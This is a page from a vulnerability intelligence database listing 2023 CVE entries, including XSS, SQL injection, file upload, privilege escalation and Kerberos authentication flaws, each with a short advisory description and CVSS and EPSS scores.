Threat and Vulnerability Intelligence Database

RSS Feed

Example Searches:

CVE
Threat Actors
Countries
Vendors
Severity
Known Exploited

CVE-2023-34830
i-doit Open v24 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the timeout parameter on the login page.
Description: i-doit Open v24 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the timeout parameter on the login page.

CVSS: LOW (0.0)

EPSS Score: 0.08%

Source: CVE
December 6th, 2024 (6 months ago)

CVE-2023-34736
Guantang Equipment Management System version 4.12 is vulnerable to Arbitrary File Upload.
Description: Guantang Equipment Management System version 4.12 is vulnerable to Arbitrary File Upload.

CVSS: LOW (0.0)

EPSS Score: 0.11%

Source: CVE
December 6th, 2024 (6 months ago)

CVE-2023-34673
Elenos ETG150 FM transmitter running on version 3.12 was discovered to be leaking SMTP credentials and other sensitive information by exploiting...
Description: Elenos ETG150 FM transmitter running on version 3.12 was discovered to be leaking SMTP credentials and other sensitive information by exploiting the publicly accessible Memcached service. The attack can occur over the public Internet in some cases.

CVSS: LOW (0.0)

EPSS Score: 0.13%

Source: CVE
December 6th, 2024 (6 months ago)

CVE-2023-34672
Improper Access Control leads to adding a high-privilege user affecting Elenos ETG150 FM transmitter running on version 3.12 by exploiting user's...
Description: Improper Access Control leads to adding a high-privilege user affecting Elenos ETG150 FM transmitter running on version 3.12 by exploiting user's role within the admin profile. An attack could occur over the public Internet in some cases.

CVSS: LOW (0.0)

EPSS Score: 0.15%

Source: CVE
December 6th, 2024 (6 months ago)

CVE-2023-34671
Improper Access Control leads to privilege escalation affecting Elenos ETG150 FM transmitter running on version 3.12 by exploiting user's role in...
Description: Improper Access Control leads to privilege escalation affecting Elenos ETG150 FM transmitter running on version 3.12 by exploiting user's role in the user profile. An attack could occur over the public Internet in some cases.

CVSS: LOW (0.0)

EPSS Score: 0.15%

Source: CVE
December 6th, 2024 (6 months ago)

CVE-2023-34601
Jeesite before commit 10742d3 was discovered to contain a SQL injection vulnerability via the component ${businessTable} at /act/ActDao.xml.
Description: Jeesite before commit 10742d3 was discovered to contain a SQL injection vulnerability via the component ${businessTable} at /act/ActDao.xml.

CVSS: LOW (0.0)

EPSS Score: 0.21%

Source: CVE
December 6th, 2024 (6 months ago)

CVE-2023-34464
XWiki vulnerable to stored cross-site scripting via any wiki document and the displaycontent/rendercontent template
Description: XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Starting in version 2.2.1 until versions 14.4.8, 14.10.5, and 15.1RC1 of org.xwiki.platform:xwiki-platform-web and any version prior to 14.4.8, 14.10.5, and 15.1.RC1 of org.xwiki.platform:xwiki-platform-web-templates, any user who can edit a document in a wiki like the user profile can create a stored cross-site scripting attack. The attack occurs by putting plain HTML code into that document and then tricking another user to visit that document with the `displaycontent` or `rendercontent` template and plain output syntax. If a user with programming rights is tricked into visiting such a URL, arbitrary actions be performed with this user's rights, impacting the confidentiality, integrity, and availability of the whole XWiki installation. This has been patched in XWiki 14.4.8, 14.10.5 and 15.1RC1 by setting the content type of the response to plain text when the output syntax is not an HTML syntax.

CVSS: CRITICAL (9.1)

EPSS Score: 0.07%

Source: CVE
December 6th, 2024 (6 months ago)

CVE-2023-34145
An untrusted search path vulnerability in the Trend Micro Apex One and Apex One as a Service security agent could allow a local attacker to...
Description: An untrusted search path vulnerability in the Trend Micro Apex One and Apex One as a Service security agent could allow a local attacker to escalate their privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This is a similar, but not identical vulnerability as CVE-2023-34144.

CVSS: LOW (0.0)

EPSS Score: 0.09%

Source: CVE
December 6th, 2024 (6 months ago)

CVE-2023-34144
An untrusted search path vulnerability in the Trend Micro Apex One and Apex One as a Service security agent could allow a local attacker to...
Description: An untrusted search path vulnerability in the Trend Micro Apex One and Apex One as a Service security agent could allow a local attacker to escalate their privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This is a similar, but not identical vulnerability as CVE-2023-34145.

CVSS: LOW (0.0)

EPSS Score: 0.09%

Source: CVE
December 6th, 2024 (6 months ago)

CVE-2023-3326
Network authentication attack via pam_krb5
Description: pam_krb5 authenticates a user by essentially running kinit with the password, getting a ticket-granting ticket (tgt) from the Kerberos KDC (Key Distribution Center) over the network, as a way to verify the password. However, if a keytab is not provisioned on the system, pam_krb5 has no way to validate the response from the KDC, and essentially trusts the tgt provided over the network as being valid. In a non-default FreeBSD installation that leverages pam_krb5 for authentication and does not have a keytab provisioned, an attacker that is able to control both the password and the KDC responses can return a valid tgt, allowing authentication to occur for any user on the system.

CVSS: LOW (0.0)

EPSS Score: 0.26%

Source: CVE
December 6th, 2024 (6 months ago)